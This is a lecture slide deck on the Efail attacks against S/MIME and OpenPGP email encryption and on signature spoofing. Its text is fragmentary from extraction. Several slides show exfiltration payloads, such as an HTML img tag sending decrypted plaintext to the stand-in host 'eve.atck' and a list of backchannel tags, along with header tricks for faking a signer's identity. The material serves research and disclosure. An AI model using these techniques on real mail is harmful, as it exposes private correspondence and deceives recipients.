Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Efail attack and its implications

Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2

Juraj Somorovsky

About this talk

• Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels. Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018

• Johnny, you are fired! Spoofing OpenPGP and S/MIME Signatures in Email. Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno Böck, Sebastian Schinzel, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2019

3

Email.

Internet Message Format („Email“)

4

From: Alice

To: Bob

Subject: Breaking News

Congratulations, you have been promoted!

Multipurpose Internet Mail Extensions (MIME)

5

From: Alice

To: Bob


Content-Type: text/plain


Multipurpose Internet Mail Extensions (MIME)

6

From: Alice

To: Bob


Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY

Content-type: text/plain


--BOUNDARY

Content-type: application/pdf

Contract...

--BOUNDARY--

smtp.corp1

av1.com

archive.corp1

smtp.corp2

av2.com

archive.corp2

imap.corp1imap.corp2

imap.corp1

smtp.corp1

av1.com

archive.corp1

10

There is no such thing as

“My Email”.

imap.corp1

smtp.corp1

av1.com

archive.corp1

Assumption:

Attacker has access to emails!

Motivation for using end-to-end encryption

Insecure Transport• TLS might be used – we don’t know!

Nation state attackers (see also lecture given by Tibor)• Massive collection of emails

• Snowden’s global surveillance disclosure

Breach of email provider / email account• Single point of failure

• Aren’t they reading/analyzing my emails anyway?

12

Two competing standards

OpenPGP (RFC 4880)

• Favored by privacy advocates

• Web-of-trust (no authorities)

S/MIME (RFC 5751)

• Favored by organizations

• Multi-root trust-hierarchies

13

Signed Email (S/MIME)

14

From: Alice

To: Bob


Content-Type: multipart/signed; boundary="BOUNDARY“;

protocol="application/pkcs7-signature“

--BOUNDARY



--BOUNDARY

Content-Type: application/pkcs7-signature

Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExDzANBglghkgBZQMEAgEFAD…

OlA9pggcyAAAAAAAAA==

--BOUNDARY--


15

From: Alice

To: Bob




--BOUNDARY



--BOUNDARY





--BOUNDARY--


16

From: Alice

To: Bob




--BOUNDARY



--BOUNDARY





--BOUNDARY--

Signed Email (PGP)

17

From: Alice

To: Bob


Content-Type: multipart/signed; boundary="BOUNDARY";

protocol="application/pgp-signature“

--BOUNDARY



--BOUNDARY

Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----

iQE/BAEBAgApBQJbW1tqIhxCcnVjZSBXYXluZSA8YnJ1Y2V3YX…

-----END PGP SIGNATURE-----

--BOUNDARY--

Encrypted Email (PGP)

18

From: Alice

To: Bob


Content-Type: multipart/encrypted; boundary="BOUNDARY";

protocol="application/pgp-encrypted";

--BOUNDARY

Content-Type: application/octet-stream; name="encrypted.asc"

Content-Description: OpenPGP encrypted message

Content-Disposition: inline; filename="encrypted.asc"

-----BEGIN PGP MESSAGE-----

hQIMA0Zy9l4Cw+FaAQ//YewiWjMoX2BebbwJQJMJxvHRoF30NjkZe88m9kGts/tn

DgkUPQEgJJJq/K1TwyAvR8tSLq…

-----END PGP MESSAGE-----

--BOUNDARY--

Known limitations!

Usability

Snowden EffektEnigmailNew keys at keyserverHard for S/MIME

Opsec von Snowden und thegruqVer- und Entschlüsselung nur in separater

Anwendung!

19

New published PGP public keys per month

?

• https://vimeo.com/56881481

• https://gist.github.com/grugq/03167bed45e774551155

Some tutorials recommend using PGP outside of email client.

Others recommendedEnigmail in defaultsettings (i.e. HTMLswitched on)

PGP and OpSec

20

https://vimeo.com/56881481

https://gist.github.com/grugq/03167bed45e774551155

21

Ok, so how about the security?

22

‘06

‘15

‘99

1. Breaking Email Encryption

1. Malleability Gadget Attacks on S/MIME

2. Malleability Gadget Attacks on OpenPGP

3. Direct Exfiltration Attacks

4. Responsible Disclosure

2. Breaking Email Signatures

1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

23

2014: Enigmail won’t encrypt.

24

https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/

https://sourceforge.net/p/enigmail/forum/support/thread/3e7268a4/

25

2017: Outlook includes plaintext in encrypted email.

https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/

https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/

2018: Enigmail/PEP won‘t encrypt.

26

https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html

https://www.heise.de/security/meldung/c-t-deckt-auf-Enigmail-verschickt-Krypto-Mails-im-Klartext-4180405.html

Both standards use old crypto

Ciphertext C = Enc(M)

C1

valid/invalid

M = Dec(C)

C2

valid/invalid

…(repeated several times)

Both standards use old crypto

27

Old crypto has no negative impact

CBC / CFB modes of operation used, but their usage is not exploitable

29

Assumption: Email is non-interactive

Old crypto has no negative impact

Backchannel

• Any functionality that forces the email client to interact with the network

• HTML/CSS

• JavaScript

• Email header

• Attachment preview

• Certificate verification

30

<img src="http://efail.de"><object data="ftp://efail.de"><style>@import '//efail.de'</style>...XSS cheat sheetsDisposition-Notification-To: [email protected]: http://efail.deX-Image-URL: http://efail.de…OCSP, CRL, intermediate certsPDF, SVG, VCards, etc.

http://efail.de/

ftp://efail.de/

mailto:[email protected]

http://efail.de/

http://efail.de/

Windows

Linux

macOS

iOS

Android

Webmail

Webapp

OutlookIBM Notes

PostboxFoxmail

Live MailPegasus

The Bat!Mulberry

eM Client

Thunderbird

EvolutionKMailTrojitá

ClawsMutt

Apple Mail Airmail MailMate

Mail App CanaryMail Outlook

K-9 MailR2Mail

MailDroidNine

GMailOutlook.com

Yahoo!iCloud

GMXHushMail

Mail.ruFastMail

Roundcube

RainLoop AfterLogicHorde IMP

ProtonMailMailfence

MailboxZoHo Mail

leak by defaultask user leak via bypass script execution

Backchannelsfound

W8MailW10MailWLMail

Mailpile

Exchange GroupWise

Evaluation of backchannels in email clients

31

Attacker model

32

Attacker model

33







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

34

S/MIME uses CBC

• Cipher Block Chaining mode of operation

• Not authenticated

• Vulnerable to many attacks (TLS, XML Encryption, SSH)

• Basic problem: malleability

Source: wikipedia

Malleability of CBC

36

decryption

C1

P0

decryption

C2

P1

C0

Malleability of CBC

37

decryption

Content-type: te

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

C0'

Malleability of CBC

38

decryption

Zontent-type: te

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

C0'

Malleability of CBC

39

C0 ⊕ P0

decryption

0000000000000000

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

CBC Gadget

Malleability of CBC

40

C0 ⊕ P0⊕ Pc

decryption

<img src=”ev.il/

C1

P0'

decryption

xt/html\nDear Bob

C2

P1

Malleability of CBC

41

decryption

Content-type: te

C1'

P0'

decryption

Zt/html\nDear Bob

C2

P1'

C0

Malleability of CBC

42

decryption

????????????????

C1'

P0'

decryption

Zt/html\nDear Bob

C2

P1'

C0

Practical Attack against S/MIME

43

???????????????? <img "

Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi

???????????????? " src="efail.de/

???????????????? Content-type: te xt/html\nDear Sir or Madam, the se

???????????????? ">

Original

Crafted

44

Practical Attack against S/MIME

Demo







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

46

OpenPGP

• OpenPGP uses a variation of CFB-Mode

• Uses integrity protection with MDC (Modification Detection Code)

• Compression is enabled by default

48

Ci

Pi (known)

Ci+1

Pi-1

encryption encryption

XCi

encryption

Pc (chosen) random plaintext? ? ? ? ? ? ? ?

encryption

RFC4880 on Modification Detection Codes

Defeating integrity protection

50

Vulnerable Not Vulnerable

Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE

Outlook 2007 GPG4WIN 3.0.0

Outlook 2010 GPG4WIN



Thunderbird Enigmail 1.9.9

Apple Mail (OSX) GPGTools 2018.01

MDC Stripped MDC Incorrect SEIP -> SE

54

55







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

56

Direct exfiltration

• This attack is possible since 2003 in Thunderbird

• Independent of the applied encryption scheme

• Somewhat fixable in implementation

• But works directly in …• Apple Mail / Mail App

• Thunderbird

• Postbox

• …

• The standards do not give any definition for that!

57

Encrypting

Alice writes a Mail to Bob

From: Alice

To: Bob

Dear Bob,

the meeting tomorrow will be

at 9 o‘clock.


hQIMA1n/0nhVYSIBARAAiIsX1QsH

ZObL2LopVexVVZ1uvk3wieArHUg…


Alice’s mail program encrypts the email

Direct exfiltration

58

Original E-Mail

Eve’s attack E-Mail

Content-Type: text/html

<img src="http://eve.atck/


">

From: Eve

To: Bob

From: Alice

To: Bob

Eve modifies the email and sends it to Bob or AliceEve captures the encrypted mail between Alice and Bob





Direct exfiltration

59

Bob’s mail program decrypts the email

Decrypting





">

From: Eve

To: Bob

Bob’s mail program puts the clear text back into the body





Dear Bob,


at 9 o‘clock.

Direct exfiltration

60





">

Dear Bob,


at 9 o‘clock.


<img

src="http://eve.atck/Dear

Bob,


at 9 o‘clock.“>

From: Eve

To: Bob

GET /Dear%20Bob%2C%0D%0Athe

%20meeting%20tomorrow%20will

%20be%20at%209%20o%E2%80%98c

lock.

Eve

Direct exfiltration

61







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

62

63

S/M

IME

Op

enP

GP

Exfiltrating many emails

Recap:

• Attacker can exfiltrate hundreds of S/MIME or OpenPGP ciphertexts

with single malicious email.

• Victim merely needs to open the email.

• In May 2018, two widely used clients (Apple Mail and Thunderbird)

either

• weren‘t patched or

• patches were insufficient

64

It did not work well

• Embargo broken

• Community angry

• Of course, nobody read the paper

67

68

An independent

summary of the

disclosure timeline,

compiled from

public information.

http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html

http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html

Disclosure; lessons learnt

1. Stick to a 90 day disclosure deadline.

2. Be careful with disclosure pre-announcements, because:

• People will speculate about the details and

a) underrate/overrate the risk, and

b) spread false information.

• you won‘t be in control of communicating the details.

3. Controlling information flow right after disclosure is essential.

70

Having a website with general information is necessary (logo ???)

71

How about thecountermeasures?

S/MIME Version 4.0 (RFC 8551)

• References EFAIL paper

• Recommends the usage of authenticated encryption with AES-GCM

72



OpenPGP - draft-ietf-openpgp-rfc4880bis-07

• Deprecates Symmetrically Encrypted (SE) data packets

• Proposes AEAD protected data packets

• Implementations should not allow users to access erroneous data

75

How about signatures?

• Encrypt-then-sign?

• Sign-then-encrypt?

…and of course, there are also different problems







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

77

Motivation

• We already broke email encryption

• The systems are set up;• Configuring S/MIME and PGP is the most challenging part of our research

• How about email signatures?

Attacker-controlled UI elements

Signature Spoofing

We attack the presentation and interpretation of email signatures.

We do not attack the underlying cryptography.

80

As a cryptographer, you should consider this as a neat warning that strong crypto is not everything

Methodology

• 25 clients• PGP and S/MIME• All major platforms

• Developed 5 attack classes:• 3 common• 1 specific to PGP• 1 specific to S/MIME

• Considered 3 forgery classes

Forgery Classes

● Perfect forgery ◐ Partial forgery ○Weak forgery

82

Forgery Classes

83


Forgery Classes

84








1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

86

87

88

UI Redressing – Causes

• HTML and CSS support in email clients

• Security indicators in mail body• Often implemented by third-party plugin• Intuitive (signature assigned to plaintext)

89

UI Redressing – Countermeasures

90

Enigmail< 2.0.8

Enigmail≥ 2.0.8

91







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

92

How Is Signer Bound to Signed Content?

93

Identity Binding Attacks

94

What could possibly go wrong?


95

Eve <[email protected]>From:

Displayed senderVerification logic

RFC 5322 display names


96

From: [email protected]


From: [email protected] <[email protected]>

Displayed senderVerification logic


Sender: [email protected]

Reply-to: [email protected]

Multiple headers


97

From: [email protected] [ whitespace ] <[email protected]>

[valid signature by [email protected]]

<[email protected]>

Identity Binding Attacks – Causes & Countermeasures

• Functional features (Sender, From) have becomesecurity relevant

• Explicitly showing signer details shifts problem to user

98

99

106







1. UI Redressing

2. Identity Binding

3. Conclusions

Overview

107

Conclusions

• Introduced malleability gadgets and backchannels

• Self-exfiltrating plaintexts; applicable to different standards as well

• Crypto standards need to evolve• Current S/MIME is broken

• OpenPGP needs clarification

• Signed emails have problems as well

• Crypto standards are not only about strong cryptographic algorithms

• Secure HTML email is challenging

108

Juraj Somorovsky - Radboud Universiteit · Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, Jörg Schwenk. USENIX Security 2018 •Johnny, you are fired! Spoofing OpenPGP

Documents